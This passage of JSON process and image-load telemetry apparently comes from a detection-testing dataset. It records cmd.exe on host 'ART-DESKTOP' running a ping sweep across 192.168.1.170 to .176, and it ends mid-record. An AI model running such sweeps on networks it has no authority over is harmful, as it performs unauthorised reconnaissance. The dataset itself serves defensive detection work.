"pid": 6752, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572812140000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6752, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572812140000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6752, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572812140000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6752, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572812140000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6752, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572812140000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6752, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572812140000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6752, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572812140000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6752, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572812140000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6752, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572812140000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}" - }, - { - "event_type": "process", - "pid": 6752, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572816830000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.170", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2792, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572816980000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 2792, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572816980000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2792, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572816980000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2792, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572816980000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2792, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572816980000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2792, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572816980000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2792, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572816980000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2792, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572816980000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2792, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572816980000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 2792, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572816980000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2792, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572816980000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 2792, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572816980000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}" - }, - { - "event_type": "process", - "pid": 2792, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572821830000, - "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.171", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5116, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572821980000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5116, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572821980000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5116, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572821980000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5116, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572821980000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5116, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572821980000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5116, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572821980000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5116, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572821980000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5116, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572821980000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5116, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572821980000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5116, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572821980000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5116, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572821980000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5116, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572821980000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}" - }, - { - "event_type": "process", - "pid": 5116, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572826830000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.172", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3896, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572826980000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3896, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572826980000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3896, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572826980000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3896, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572826980000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3896, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572826980000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3896, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572826980000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3896, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572826980000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3896, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572826980000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3896, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572826980000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3896, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572826980000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3896, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572826980000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3896, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572826980000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}" - }, - { - "event_type": "process", - "pid": 3896, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572831990000, - "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.173", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7468, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572832140000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7468, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572832140000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7468, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572832140000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7468, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572832140000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7468, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572832140000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7468, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572832140000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7468, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572832140000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7468, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572832140000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7468, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572832140000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7468, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572832140000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7468, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572832140000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7468, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572832140000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}" - }, - { - "event_type": "process", - "pid": 7468, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572836830000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.174", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2960, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572836970000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 2960, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572836980000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2960, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572836980000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2960, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572836980000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2960, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572836980000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2960, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572836980000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2960, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572836980000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2960, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572836980000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 2960, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572836980000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2960, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572836980000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2960, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572836980000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 2960, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572836980000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}" - }, - { - "event_type": "process", - "pid": 2960, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572841990000, - "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.175", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5244, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572842140000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572842140000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572842140000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572842140000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572842140000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572842140000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572842140000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572842140000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572842140000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572842140000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572842140000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572842140000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}" - }, - { - "event_type": "process", - "pid": 5244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572846990000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.176", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6488, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572847140000, - "unique_pid": "{42FC7E13-CBA4-5C05-0000-0010E5425301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": 